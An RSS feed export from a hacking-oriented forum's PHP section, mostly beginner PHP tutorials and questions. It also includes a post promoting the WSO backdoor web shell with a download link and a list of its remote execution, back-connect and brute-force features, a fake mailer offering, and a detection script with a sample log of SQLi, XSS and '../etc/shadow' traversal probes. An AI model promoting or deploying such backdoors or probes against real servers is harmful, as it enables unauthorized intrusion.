<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
      <title>PHP - iExploit</title>
      <link>http://iexploit.org/index.php?p=/categories/php/feed.rss</link>
      <pubDate>Sun, 19 May 13 15:13:38 -0400</pubDate>
         <description>PHP - iExploit</description>
   <language>en-CA</language>
   <atom:link href="/index.php?p=/discussions/feed.rss" rel="self" type="application/rss+xml" />
   <item>
      <title>Fake Mailer</title>
      <link>http://iexploit.org/index.php?p=/discussion/2538/fake-mailer</link>
      <pubDate>Sun, 20 Mar 2011 00:59:37 -0400</pubDate>
      <dc:creator>s1n4</dc:creator>
      <guid isPermaLink="false">2538@/index.php?p=/discussions</guid>
      <description><![CDATA[Hi guys,<br /><br />You can use of this tool for sending fake email.<br /><br />Fake Mailer (O_o)<br /><br />Enjoy :)]]></description>
   </item>
   <item>
      <title>how Truncate is an ddl statement in mysql ?</title>
      <link>http://iexploit.org/index.php?p=/discussion/6265/how-truncate-is-an-ddl-statement-in-mysql-</link>
      <pubDate>Wed, 20 Feb 2013 10:31:55 -0500</pubDate>
      <dc:creator>mandi</dc:creator>
      <guid isPermaLink="false">6265@/index.php?p=/discussions</guid>
      <description><![CDATA[hi guys,<br><br>i have been learning about mysql database technology,while revising the concepts i found this thing confusing to me.<br><br><br><br>truncate is in ddl command,as far as i know any command that deals with <br>the structure of table  has been classified in to ddl statement,<br><br><br><br>but truncate in mysql just deletes the table data ,NOT THE STRUCTURE,<br><br>this looks like delete to me,the only difference i know  between them is<br> you can not rollback an ddl statement(i.e truncate),but you can <br>rollback on dml statement(i.e delete),beyond this i couldn't able to <br>find any difference between them.<br><br><br><br>can some one explain me this clearly]]></description>
   </item>
   <item>
      <title>Anyone know how i can download with PHP??</title>
      <link>http://iexploit.org/index.php?p=/discussion/6237/anyone-know-how-i-can-download-with-php</link>
      <pubDate>Mon, 31 Dec 2012 11:55:29 -0500</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">6237@/index.php?p=/discussions</guid>
      <description><![CDATA[So i'v been working on my shell for a while now, it works great. File browser etc all perfect but i cant seem to get it to download files :/ If anyone would be able to help me with this then that would be great.]]></description>
   </item>
   <item>
      <title>[php] wso 2.5.1</title>
      <link>http://iexploit.org/index.php?p=/discussion/6230/php-wso-2-5-1</link>
      <pubDate>Sat, 29 Dec 2012 14:11:14 -0500</pubDate>
      <dc:creator>Andr4y</dc:creator>
      <guid isPermaLink="false">6230@/index.php?p=/discussions</guid>
      <description><![CDATA[WSO is a PHP shell backdoor that provide an interface for various remote<br> operations. It can perform everything from remote code execution, <br>bruteforcing of servers, provide server information, and more.<br><br><br>Download (packetstorm) Link :<br><br><blockquote><div><a href="http://packetstormsecurity.org/files/117974/WSO-Web-Shell-2.5.1.html" target="_blank" rel="nofollow">http://packetstormsecurity.org/files/117974/WSO-Web-Shell-2.5.1.html</a></div></blockquote><br>Features:<br><br>Authorization for the cookies<br><br>Server Information<br><br>File manager (copy, rename, move, delete, chmod, touch, create files and folders)<br><br>View, hexview, editing, downloading, uploading files<br><br>Working with zip archives (packing, unpacking) + compression tar.gz<br><br>Console<br><br>SQL Manager (MySql, PostgreSql)<br><br>Execute PHP code<br><br>Working with Strings + hash search online databases<br><br>Bindport and back-Connect (Perl)<br><br>Bruteforce FTP, MySQL, PgSQL<br><br>Search files, search text in files<br><br>Support for * nix-like and Windows systems<br><br>Antipoiskovik (check User-Agent, if a search engine then returns 404 error)<br><br>You can use AJAX<br><br>Small size. Packaged version is 22.8 Kb<br><br>The choice of encoding, which employs a shell.<br><br><br><br><br>Changelog (v2.5.1):<br><br>Remove comments from the first line .<br><br>Added option to dump certain columns of tables.<br><br>the size of large files are now well defined .<br><br>in the file properties field "Create time" changed to "Change time" (<a rel="nofollow" href="http://php.net/filectime" target="_blank">http://php.net/filectime</a>).<br><br>Fixed a bug that caused not working mysql brute force if there was a port of the server .<br><br>Fixed a bug due to which one can not see the contents of a table called download in the database.<br><br><br>Youtube link :<div class="bbcode_container"><div class="Video"><object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/MreAwLEXK_E&amp;hl=en_US&amp;fs=1&amp;"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/MreAwLEXK_E&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" width="640" height="385"></object></div><br></div>]]></description>
   </item>
   <item>
      <title>[RELEASE] VISP Chat-Room Script + Uses Javascript(jQuery), SQL, PHP</title>
      <link>http://iexploit.org/index.php?p=/discussion/5998/release-visp-chat-room-script-uses-javascriptjquery-sql-php</link>
      <pubDate>Sun, 08 Apr 2012 15:24:53 -0400</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">5998@/index.php?p=/discussions</guid>
      <description><![CDATA[So here it is guys, iv been doing this on and off for a while now but i thought i would release my chat room script. Its fairly simple but works quite well. Iv also put most of the code into classes so it is layed out much nicer.<br><br>There are a few issues that i was unable to fix but on the whole it works well.<br><br>Here is a screen shot:<br>[spoiler]<br>http&#58;//imgnow&#46;tk/u/943415726&#46;png<br>[/spoiler]<br><br><span style="color: #FF0000;"><b>Don't worrie about the \n in the messages on the image, that was just m playing around, its all sorted now.</b></span><br><br>Known Issues:<br>[list]<br>[*]Clear textarea after message is sent[/*:m]<br>[*]End Session when they exit the page[/*:m]<br>[*]Might not layout the same in all browsers.[/*:m][/list:u]<br><br>As you can see they aren't massive issues although they do cause a bit of an annoyance. The layout issue is with internet explorer but it works fine with chrome and firefox. <br><br><br>Anyway how some people will find it useful. <br><br>Download: <a class="postlink" rel="nofollow" href="http://www.freefilehosting.net/vispwebchat_1">http://www.freefilehosting.net/vispwebchat_1</a>]]></description>
   </item>
   <item>
      <title>free hosting sites</title>
      <link>http://iexploit.org/index.php?p=/discussion/6044/free-hosting-sites</link>
      <pubDate>Sun, 03 Jun 2012 06:55:13 -0400</pubDate>
      <dc:creator>cyberpirate</dc:creator>
      <guid isPermaLink="false">6044@/index.php?p=/discussions</guid>
      <description><![CDATA[As I saw many new programmer always search for the good and free web hosting for the php so I just did some work for them. Here are some free php webhosting sites:-<br><a rel="nofollow" href="http://www.000webhost.com/564494.html">www.000webhost.com</a><br><a rel="nofollow" href="http://www.110mb.com">www.110mb.com</a><br><a rel="nofollow" href="http://www.zymic.com">www.zymic.com</a><br><a rel="nofollow" href="http://www.biz.nf">www.biz.nf</a><br><a rel="nofollow" href="http://www.x10hosting.com">www.x10hosting.com</a><br><a rel="nofollow" href="http://www.biz.ht">www.biz.ht</a><br>I like the 000webhosting because its give the best hosting plan for free as compared to others..:D:D.. Enjoy..:)<br>]]></description>
   </item>
   <item>
      <title>OOP versus Procedural Programming</title>
      <link>http://iexploit.org/index.php?p=/discussion/6043/oop-versus-procedural-programming</link>
      <pubDate>Sun, 03 Jun 2012 06:40:10 -0400</pubDate>
      <dc:creator>cyberpirate</dc:creator>
      <guid isPermaLink="false">6043@/index.php?p=/discussions</guid>
      <description><![CDATA[Hey Guys !!!! Normally I am busy. But today I got some free time so I <br>think I should write something about the OOP programming approach and <br>Procedure Programming approach. Because many new programmer like me <br>always get confuse between OOP because we create primarily procedural <br>code.<br><br>Lets understand these one by one and understand the differences. :)<br><br>In procedure programming approach or procedure oriented approach, the <br>problems is viewing&nbsp; in a sequence of things or tasks. And these tasks <br>are accomplished by the functions or we can say that we write the <br>functions to accomplish these tasks. This approach basically consists of<br> writing a list of instructions and organizing these instructions into <br>group known as function. In this approach because we concentrate on the <br>development of the functions thats why very little attention is given to<br> the data.<br><br>While in the OOP data is treated as a critical elements in the program <br>and does not allow it to flow freely in the system. OOP allows <br>decomposition of a problem into a number of entities called objects and <br>then build data and functions around these objects. So this the basic <br>definition of OOP and Procedure programming or we can say that basic <br>difference between them. Now lets get some more about these:-<br><br>Functions are Code-Centric which means that data first sent as input and<br> then return as output. While OOP is Data-Centric which means that data <br>is internally represent and contains the functionality or method. In OOP<br> objects contain data and behavior simultaneously while Function contain<br> data and function separated.<br><br>OOP require a different way of thinking about how you construct your <br>applications.OOP is basically all about Classes and Objects. Lets <br>understand the concept of OOP one by one.<br><br>To understand OOP let us take an example of a car. A car have its own <br>color,weight, manufacturer, gas tank etc. Those are its characteristics.<br> While a car can accelerate,stop,sound for horn etc. Those are its <br>behavior. And a car is itself a class which have characteristics and <br>behavior. A class is basically nothing&nbsp; but a unit of code. Now lets <br>come again on our example of a car.<br><br>The characteristics of car are known as its properties. Properties have a<br> name and value and they may be vary or not. Like we can change the <br>color of a car by giving its new paint job. So, what are properties in <br>OOP these are nothing but the variable declared within a class. Which <br>have its own name and value. These properties can be variable or <br>constant or static. And the behavior of a class is also known as method.<br> And we can say that a method is nothing but it its similar to a <br>function which we normally used in procedural programming.<br><br>Some concept of OOP are given below:-<br><br><i><span style="text-decoration: underline;"><b>Classes:-</b></span></i>As we say that classes are nothing but the<br> code which defines the properties and method. Class in PHP contains <br>three main components: a members,method and a constructor. A member is a<br> piece of data that an object can contains. In our car example color and<br> manufacturer are members of class car. Methods are the services which <br>are provided to client by the object or we can say that method are <br>functions. A method is also known as member function. And a constructor <br>is special method that initialize the objects into its ready state.<br><br>Example of how to define a class in PHP is given below:-<br><br>&lt;?php<br><br>class demo {&nbsp;&nbsp;&nbsp;&nbsp; // class is keyword used in php to declare a class and demo is class name here.<br><br>}<br><br>?&gt;&nbsp; &nbsp; <b><i><span style="text-decoration: underline;"><br><br>Objects:-</span></i></b> Objects are the entities constructed by a class. <br>It is an instance of the class. The process of building an object from a<br> class is known as instantiation.A class can have more than one object. <br>An example for object is given below:-<br><br>&lt;?php<br><br><br><br>$objdemo=new demo();&nbsp; // here we define a object for class demo using keyword <b>new. New</b> keyword is used to define a object for a class.<br><br><br><br>?&gt;<br><br><b>Inheritance:-</b> Inheritance is process by which objects of one <br>class acquire the properties of the objects of another class or we can <br>say that parent class. Inheritance provides the idea of reusability. We <br>can reuse a code either by copy it and paste it in another or by using <br>Inheritance. The copy paste method have major problem is that if we <br>found an error in our main code then we have to debug all the pasted <br>code. Thats why its good to use Inheritance and by using it we can <br>modify a code without changing its main properties.<b> Extends</b> keyword is using for Inheritance. Example of Inheritance is given below:-<br><br>&lt;?php<br><br>class media {<br><br>---declare some members----<br><br>function somefun(){<br><br>--some code---<br><br>}<br><br>}<br><br>class books extends media {<br><br>----some new members for books class which is subclass of media class---<br><br>function somenewfun()<br><br>{<br><br>--code for new methods for books class--<br><br>}<br><br>}<br><br>?&gt;<br><br>Here in this example I used two class one is media which is our parent <br>class and another is book which is our subclass. The subclass book have <br>all the properties and methods from the parent class media and it is <br>also have its own properties and methods which we declare in the book <br>class. The&nbsp; <b>extands </b>keyword is used to Inherit all the properties and methods of parent class to its subclass. <br><br><i><span style="text-decoration: underline;"><b>NOTE:-</b></span></i> Don't forget to change the lines --declare <br>members-- or --code for method-- to your original logic before running <br>the program in PHP.<br><br><br><br>I think this is sufficient for this section. Others properties like <br>polymorphism and access methods for a class is given to the next <br>section. Thanks for tolerating me this long time..:p;).. Hope this will<br> be helpful for some of you guys..:).. Thank You all..<br><br>]]></description>
   </item>
   <item>
      <title>A simple Calculator Example Using OOP</title>
      <link>http://iexploit.org/index.php?p=/discussion/6048/a-simple-calculator-example-using-oop</link>
      <pubDate>Sun, 03 Jun 2012 15:14:50 -0400</pubDate>
      <dc:creator>cyberpirate</dc:creator>
      <guid isPermaLink="false">6048@/index.php?p=/discussions</guid>
      <description><![CDATA[A simple code for a calculator using OOP approach is given below..;)..<br><br><br>&lt;html&gt;<br>&lt;head&gt;<br>&lt;h1 align='center'&gt;Its a simple calculator Program using OOP approach. &lt;/h1&gt;<br>&lt;title&gt; Calculator&lt;/title&gt;<br>&lt;/head&gt;<br>&lt;body&gt;<br>&lt;?php &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;//starting the php code<br>class calc {&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;//declaring a class with name calc<br>private $txt3; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;//declaring a private property for class calc, which can be access with in the class and hide from outside world.<br>public function setdata($txt1,$txt2) {&nbsp;&nbsp; &nbsp;//declaring a method to set the data for the property. <br>if($txt2=='0')&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;//To check if the value of second number is zero or not. If it is zero then print the error message.<br>{<br>echo "Error:-Second number must be a digit except a 0 !!!";<br>$this-&gt;txt3='Error';<br>}<br>elseif($_POST['cal']=='add')&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;//To check if add is selected or not when submitting a form. If it is selected go with in the if and do addition.<br>{<br>$this-&gt;txt3=$txt1+$txt2;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;//Use of this variable to refer txt3 to itself.<br>}<br>elseif($_POST['cal']=='sub')&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;//To check if sub is selected or not when submitting a form. If it is selected go with in the if and do substraction.<br>{<br>$this-&gt;txt3=$txt1-$txt2;<br>}<br>elseif($_POST['cal']=='mul')&nbsp;&nbsp; &nbsp;//To check if mul is selected or not when submitting a form. If it is selected go with in the if and do multipliction.<br>{<br>$this-&gt;txt3=$txt1*$txt2;<br>}<br>else&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;//this is the else statement for the divide.<br>$this-&gt;txt3=$txt1/$txt2;<br>}<br><br>public function getdata()&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;//declaring the method to show the output.<br>{<br>echo "&lt;p align='center'&gt;&lt;font color='red' size='5px'&gt;&lt;u&gt;&lt;b&gt;&lt;i&gt;Result is:&nbsp; $this-&gt;txt3&lt;/i&gt;&lt;/b&gt;&lt;/u&gt;&lt;/font&gt;&lt;/p&gt;";<br>}<br>}<br>$obj1=new calc();&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;//creating an object for class calc to provide service to the client.<br>$obj1-&gt;setdata($_POST['txt1'],$_POST['txt2']);&nbsp; //calling the object method to set the data with arguments passed by the user using form.<br>$obj1-&gt;getdata();&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;// calling the object method to get the output.<br>?&gt;<br>&lt;form action='test.php' method='post'&gt;<br>Number 1:-&lt;input type='text' name='txt1' /&gt; &lt;br /&gt;&lt;br /&gt;<br>Number 2:-&lt;input type='text' name='txt2' /&gt;&lt;br /&gt;&lt;br /&gt;<br>&lt;input type='radio' name='cal' value='add' &gt;add&lt;/input&gt;<br>&lt;input type='radio' name='cal' value='sub' &gt;sub&lt;/input&gt;<br>&lt;input type='radio' name='cal' value='mul' &gt;mul&lt;/input&gt;<br>&lt;input type='radio' name='cal' value='div' &gt;div&lt;/input&gt;&lt;br/&gt;&lt;br/&gt;<br>&lt;input type='submit' name='submit' value='submit'/&gt;<br>&lt;/form&gt;<br><br>&lt;/body&gt;<br>&lt;/html&gt;<br><br><br>All of the code is explained before or using the comments in the code. Thus I am not going to explain it again...;).. Thank you..:).. Hope this will help you guys..:)<br><br>]]></description>
   </item>
   <item>
      <title>OOP Versus Procedure Programming Part2</title>
      <link>http://iexploit.org/index.php?p=/discussion/6047/oop-versus-procedure-programming-part2</link>
      <pubDate>Sun, 03 Jun 2012 14:58:54 -0400</pubDate>
      <dc:creator>cyberpirate</dc:creator>
      <guid isPermaLink="false">6047@/index.php?p=/discussions</guid>
      <description><![CDATA[As we discussed about OOP basic concepts in Previous section. Now let us understand&nbsp; some more concept. If you ar not aware about what is OOP then please read my previous <br>thread. :)<br><br><b>Polymorphism:-</b>It is another important concept for the OOP. The word is taken from a GREEK language which means the ability to take more than one form. In polymorphism a operation may exhibit different behavior in different instances. If you read my previous blog carefully you know about behavior and instances. Now let us understand this polymorphism with help of a simple example:- Let us suppose we have to add two numbers than in case of two numbers the result is a third number which is sum of the two numbers. But what happen in case of strings. In case of two strings we have concatenation the two strings. The process of making an operator to exhibit different behaviors in different instances is known as operator overloading.<br><b><br>Adding a property and method to a class:-</b> This is very easy to add a new propety to our class we simply have to declare a variable inside the class to hold the value of property. The same is done for the method except in adding a method we have to declare a function. Example for this is:-<br><br>&lt;?php<br>&nbsp;<br>class demo{<br>public $prop;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; //we are adding a property here.<br>function getdata() {<br>print "hello $this-&gt;prop is new property!!";<br>}<br>}<br>$obj1=new demo();<br>$obj2=new demo();<br>$obj1-&gt;prop='cyberpirate';<br>$obj1-&gt;getdata();<br>$obj2-&gt;prop='iexploit';<br>$obj2-&gt;getdata();<br><br><br>?&gt;<br><br>Now in this code two new things come into play in this statement <b>'print "hello $this-&gt;prop is new property"'</b>. Now you guys may be thinking that what is this bullshit here in this line. Let us understand it here <b>-&gt;</b> is an operator which is used to access the method and property. If anyone familier with c++ then he knew about dot operator which is used to access the property of the class. Here<b> -&gt;</b> this operator is doing the same thing. And the another is variable <b>$this</b> it is used to refer to the current instances.Like in the above example we used two objects but we dont know in advance what is the name of the objects thats why we used $this variable because <b>$this</b> variable allows each object to access its own properties and methods whiout having to know the name of the variable that represents in the exterior program. We never use a <b>$</b> sign in front of a property when we have to access this property using <b>$this</b> and <b>-&gt;</b>. <br>Note:- We used three keyword to protect our data from the external world. These are <b>public, private and protected</b>. Let us understand these one by one:-<br><b>public:-</b> This keyword is used to declare a property as a public property which means you can access this property outside the class. One example of this keyword is given above. <br><b>private:-</b> This keyword is used to declare a property as a private property which means we can not access this type of property outside the class. Now change in above example use private in place of public and then see what happens.<br><b>protected:-</b>This keyword is used to declare a property as a protected property which means we can not access this type of property outside the class. But we can access it with derived objects or in other words we can say that in inheriting class.<br><br><b>Constructors:</b>- A keyword _construct is used in constructor method. It is automatically used to perform various initialization such as property initialization. Example:-<br><br>&lt;?php<br><br>class demo {<br>public $name;<br>public function _construct($name) {&nbsp;&nbsp; //construct function to initialize<br>$this-&gt;name=$name;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; // initialization of data<br>}<br>function getdata () {<br>echo "Hello $this-&gt;name";<br>}<br>}<br>$obj1=new demo();<br>$obj1-&gt;_construct('iexploit');<br>$obj1-&gt;getdata();<br><br>?&gt;<br><b><br>Destructors:</b>- This is used to delete a object or remove it from the system memory when a request is completed running. To do so just create a function called _destruct with no parameters. Before destroying an object it automatically save the data. Suppose we are working with the database then before destroying an object for this database it update the database if changes are made. It means if any properties of the object is changed, they are automatically saved backt to the database when object is destroyed.<br><br>I think this sufficient for this section. In the section I am going to show you guys a simple calculator application with OOP approach..:).. Thanks again. And feel free to comment your comment will encourage me to post more threads for this section..:)<br><br>]]></description>
   </item>
   <item>
      <title>about autosubmission of form need help</title>
      <link>http://iexploit.org/index.php?p=/discussion/6026/about-autosubmission-of-form-need-help</link>
      <pubDate>Thu, 17 May 2012 10:18:00 -0400</pubDate>
      <dc:creator>cyberpirate</dc:creator>
      <guid isPermaLink="false">6026@/index.php?p=/discussions</guid>
      <description><![CDATA[Can anybody help me?? i want to write a auto submission script in php.. So that a script can easily submit a form automatically.. I dont have any idea can anybody help me.. <br>]]></description>
   </item>
   <item>
      <title>Detecting possible hacking attempts</title>
      <link>http://iexploit.org/index.php?p=/discussion/2473/detecting-possible-hacking-attempts</link>
      <pubDate>Sat, 12 Mar 2011 03:48:21 -0500</pubDate>
      <dc:creator>chroniccommand</dc:creator>
      <guid isPermaLink="false">2473@/index.php?p=/discussions</guid>
      <description><![CDATA[Hey just figured I'd show you a simple way to detect possible hacking attempts. I'll be using a page with a text box that echoes input and logs possible XSS,SQLi, LFI and RFI<br><br>First we create a file named ip_logs.txt and chmod it so the other file can append/write to it. Now we create the php file with the input box.<br><br><div class="PreContainer"><pre><br>&amp;lt;?php<br>if(isset($_GET&#91;'input'&#93;))<br>{<br>$page = $_GET&#91;'input'&#93;;<br>$logfile = \&quot;ip_log.txt\&quot;; //Catch hacking attempts<br>$file = fopen($logfile, 'a');<br>$ip = $_SERVER&#91;'REMOTE_ADDR'&#93;; //Get current IP<br>$curpage = $_SERVER&#91;'PHP_SELF'&#93;; //Get the page<br>$input = $_SERVER&#91;'QUERY_STRING'&#93;; //Get the query used<br>$writes = \&quot;\nIP&#58; \&quot; . $ip . \&quot;    Page&#58; \&quot; . $curpage . \&quot;    Attempt&#58; \&quot; . $input;<br>if(strstr($page, '&amp;lt;')) //Detect possible start of &amp;lt;script&amp;gt; or any other tag<br> {<br>   fwrite($file, $writes); //Write IP,Page and attempt string<br>   fclose($file);<br>   die(\&quot;Hacking attempt detected. IP logged\&quot;); //Kill the script<br> }<br>elseif(strstr($page, \&quot;'\&quot;)) //Detect possible SQLi probe<br> {<br>   fwrite($file, $writes);<br>   fclose($file);<br>   die(\&quot;Hacking attempt detected. IP logged\&quot;);<br> }<br>elseif(strstr($page, \&quot;../\&quot;)) //Detect possible LFI's<br> {<br>   fwrite($file, $writes);<br>   fclose($file);<br>   die(\&quot;Hacking attempt detected. IP logged\&quot;);<br> }<br>elseif(strstr($page, \&quot;./\&quot;)) //Another possible LFI(Current directory transversal)<br> {<br>   fwrite($file, $writes);<br>   fclose($file);<br>   die(\&quot;Hacking attempt detected. IP logged\&quot;);<br> }<br>elseif(strstr($page, \&quot;http&#58;//\&quot;)) //Detect possible RFI<br> {<br>   fwrite($file, $writes);<br>   fclose($file);<br>   die(\&quot;Hacking attempt detected. IP logged\&quot;);<br> }<br>elseif(strstr($page, \&quot;https&#58;//\&quot;)) //Another possible RFI using secure HTTP<br> {<br>   fwrite($file, $writes);<br>   fclose($file);<br>   die(\&quot;Hacking attempt detected. IP logged\&quot;);<br> }<br>else<br> {<br>   echo $page;<br> }<br>}<br>?&amp;gt;<br>&amp;lt;html&amp;gt;<br>&amp;lt;body&amp;gt;<br>&amp;lt;form name=\&quot;input\&quot; method=\&quot;get\&quot;&amp;gt;<br>Text&#58; &amp;lt;input type=\&quot;text\&quot; name=\&quot;input\&quot; /&amp;gt;<br>&amp;lt;input type=\&quot;submit\&quot; value=\&quot;Submit\&quot; /&amp;gt;<br>&amp;lt;/form&amp;gt; <br>&amp;lt;/body&amp;gt;<br>&amp;lt;/html&amp;gt;<br><br></pre></div><br>Yes, not the best approach to it. The better approach would be to use an array or regex search. But anyway it's pretty simple. Here is a sample ip_log.txt:<br><div class="PreContainer"><pre><br>IP&amp;#58; &amp;#58;&amp;#58;1    Page&amp;#58; /t&amp;#46;php    Attempt&amp;#58; input=%3Cscript%3E<br>IP&amp;#58; &amp;#58;&amp;#58;1    Page&amp;#58; /t&amp;#46;php    Attempt&amp;#58; input=%27<br>IP&amp;#58; &amp;#58;&amp;#58;1    Page&amp;#58; /t&amp;#46;php    Attempt&amp;#58; input=%27<br>IP&amp;#58; &amp;#58;&amp;#58;1    Page&amp;#58; /t&amp;#46;php    Attempt&amp;#58; input=&amp;#46;&amp;#46;%2F<br>IP&amp;#58; &amp;#58;&amp;#58;1    Page&amp;#58; /t&amp;#46;php    Attempt&amp;#58; input=&amp;#46;&amp;#46;%2F&amp;#46;&amp;#46;%2F&amp;#46;&amp;#46;%2Fetc%2Fshadow<br>IP&amp;#58; &amp;#58;&amp;#58;1    Page&amp;#58; /t&amp;#46;php    Attempt&amp;#58; input=http%3A%2F%2Fgoogle&amp;#46;com%2F<br></pre></div>]]></description>
   </item>
   <item>
      <title>need some php/sql help</title>
      <link>http://iexploit.org/index.php?p=/discussion/5906/need-some-phpsql-help</link>
      <pubDate>Sun, 25 Sep 2011 20:20:09 -0400</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">5906@/index.php?p=/discussions</guid>
      <description><![CDATA[so im playing around with php and sql and i was wondering if anyone could help me, i want to run an sql command and it to return me the table name's, i tryed googleing but i dont exactly know what im searching for. Im using this but it doesnt work:<br><br><div class="PreContainer"><pre><br>if($login){<br>mysql_connect(\&quot;localhost\&quot;, \&quot;root\&quot;, \&quot;\&quot;);<br>mysql_select_db(\&quot;users\&quot;);<br>echo \&quot;Fetching Data&amp;#46;&amp;#46;&amp;#46;\&quot;;<br>$collect = mysql_query(\&quot;SELECT * FROM INFORMATION_SCHEMA&amp;#46;COLUMNS\&quot;);<br>echo $collect;<br><br>}<br></pre></div><br><br>any help?]]></description>
   </item>
   <item>
      <title>Need a little help with sourcex update</title>
      <link>http://iexploit.org/index.php?p=/discussion/5880/need-a-little-help-with-sourcex-update</link>
      <pubDate>Tue, 20 Sep 2011 22:52:39 -0400</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">5880@/index.php?p=/discussions</guid>
      <description><![CDATA[So basically i have found something that could be used as malicious to my site, i have found that people can just submit any image with any link so i was wondering how can i edit this code so it block's certain website links<br><br><div class="PreContainer"><pre><br>$submit = strip_tags($_POST&amp;#91;'submit'&amp;#93;);<br>$url = htmlentities(strip_tags($_POST&amp;#91;'url'&amp;#93;));<br>$img = htmlentities(strip_tags($_POST&amp;#91;'img'&amp;#93;));<br>					 <br>					 if ($submit)<br>					 {<br>					 <br>if ($img&amp;&amp;$url)<br>{<br><br><br>    //open database<br>    $connect = mysql_connect('host', 'user', 'pass');<br>mysql_select_db('database');<br>    mysql_query(\&quot;<br><br>    <br><br>    echo \&quot;&amp;lt;em&amp;gt;Banner Added, We hope you get large amounts of traffic&amp;#46;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;img src=\&quot;&amp;#46;$img&amp;#46;\&quot; width='125' height='125' &amp;gt;&amp;lt;/em&amp;gt;\&quot;;<br><br>}else {<br>	echo \&quot;Please fill all field's Correctly&amp;#46;\&quot;;<br>}<br>}<br></pre></div> <br><br>I would like to edit it so that if the link contains virus/porn etc it to echo Invalid or Malicous Link. I thought that it could stor a whole list of bad links in an array and check through to see but i dont know how to do that.<br><br>Any help.<br><br>P.S Iv hidden My SQL query]]></description>
   </item>
   <item>
      <title>Just Another guy asking suggestion for learning php</title>
      <link>http://iexploit.org/index.php?p=/discussion/1743/just-another-guy-asking-suggestion-for-learning-php</link>
      <pubDate>Tue, 23 Nov 2010 20:28:42 -0500</pubDate>
      <dc:creator>mandi</dc:creator>
      <guid isPermaLink="false">1743@/index.php?p=/discussions</guid>
      <description><![CDATA[Suggest me a best book for understanding the basics of php,<br />For now i am looking  to build a strong base in the php and it's basics,<br /><br />I am willing to learn php for "web-security" related things,not for professional purposes like web-designing,<br /><br />Do i need to learn  Object oriented part of the php as well?<br /><br />Also i heared majority of the  web-sites on the internet(like 60-70%) has been coded with php,so learning php will feed my needs?<br /><br />or do i need to learn other languages like html and asp as well?<br /><br />if not please advice me,what i should do and what i should not do,<br /><br />Also suggest me a Good e-book for beginning php....<br /><br />hope i will get some "worthy" advice..]]></description>
   </item>
   <item>
      <title>SourcEx - Looking for help from PHP Coder for SourcEx</title>
      <link>http://iexploit.org/index.php?p=/discussion/5666/sourcex-looking-for-help-from-php-coder-for-sourcex</link>
      <pubDate>Wed, 10 Aug 2011 14:38:25 -0400</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">5666@/index.php?p=/discussions</guid>
      <description><![CDATA[Hey p-teo here. Im looking to recruit a php coder who knows what they are doing. Why?<br><br>I have a website called SourcEX http&#58;//www&#46;sourcex&#46;info/ and iv had many people telling me that it is  good idea and what improvements they would like to see on this site. Unfortunately im not good enough for some of the stuff they would like to see.<br><br>Suggestions:<br> - Advanced Search<br> - Top Uploaders Page<br> - A Paste bin form to submit from my site.<br><br><br>As you can see, some of the ideas they would like to see are quite complex, hens i have come looking for help.<br><br><br>So will you get paid?<br><br>Well the answer is no, currently the website is not generating any income as it has only been live since 5th august. But your will be fully recognised as one of the website creators/admins.<br><br><br>If you would like to help or get in contact with me about this then make a post or PM me.]]></description>
   </item>
   <item>
      <title>simple php shell</title>
      <link>http://iexploit.org/index.php?p=/discussion/5695/simple-php-shell</link>
      <pubDate>Sun, 14 Aug 2011 22:17:58 -0400</pubDate>
      <dc:creator>schumbag</dc:creator>
      <guid isPermaLink="false">5695@/index.php?p=/discussions</guid>
